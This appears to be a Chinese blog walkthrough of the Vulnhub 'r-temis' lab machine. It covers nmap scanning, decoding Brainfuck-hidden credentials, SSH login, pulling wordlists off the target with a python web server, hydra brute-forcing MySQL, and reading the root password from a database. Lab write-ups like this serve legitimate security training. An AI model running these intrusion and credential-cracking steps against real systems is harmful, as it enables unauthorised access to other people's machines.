Vulnhub實戰-rtemis靶機?

胖三斤1發表於2022-01-04

Vulnhub實戰-rtemis靶機?

下載地址:http://www.vulnhub.com/entry/r-temis-1,649/

描述

image

通過描述我們知道這個靶機有兩個flag

主機發現

通過nmap掃描發現主機

nmap -sn 192.168.33.0/24

nmap -sS -p- -v -A 192.168.33.9

image

我們發現靶機開放的埠如下:

80埠 Apache httpd 2.4.38
3306埠 MySQL 5.7.32
7223埠 OpenSSH 7.9p1 Debian 10+deb10u2

接下來我們訪問http服務看看有什麼線索!

web服務探測

  1. 訪問IP獲得如下頁面:

image

  1. 接下來我們目錄掃描發現easy.txt檔案

image

  1. 訪問easy.txt檔案獲得如下Brainfuck密碼:

image

解密工具地址:http://www.hiencode.com/brain.html

  1. 通過解密我們獲得一對賬號密碼:

rtemis:t@@rb@ss

嘗試主機登入

  1. 通過上面獲得的賬號密碼,我們嘗試通過SSH登入靶機

ssh rtemis@192.168.33.9 -p 7223(因為我們上面發現ssh登入埠是7223埠,不是預設的22埠!)

image

我們發現此時使用者是普通使用者,我們肯定看不了root資料夾,我們嘗試看看home資料夾有什麼!

  1. 在home資料夾發現 user.txtpass.txt

image

  1. 通過hydra暴力破解 mysql 密碼

我嘗試使用python,發現靶機安裝有python3,所以我們可以通過python3開啟http服務,講這兩個txt檔案下載到本地

靶機: python3 -m http.server 9999

kali: wget http://192.168.33.9:9999/user.txt wget http://192.168.33.9:9999/pass.txt

image

通過hydra暴力破解mysql密碼:

hydra -L /root/user.txt -P /root/pass.txt 192.168.33.9 mysql -t 10

image

  1. 登入mysql,發現root密碼

我們拿到mysql賬號和密碼之後嘗試登入mysql:

mysql -usomu -p

image

接著我們一步一步發現了root使用者的密碼:

show databases;
use secret;
show tables;
select * from secret;

image

拿到root許可權

我們拿到root的密碼之後,登入root使用者 su

image

然後我們查詢flag檔案:find / -name flag*

image

我們發現了兩個flag檔案。實驗結束!!!?

相關文章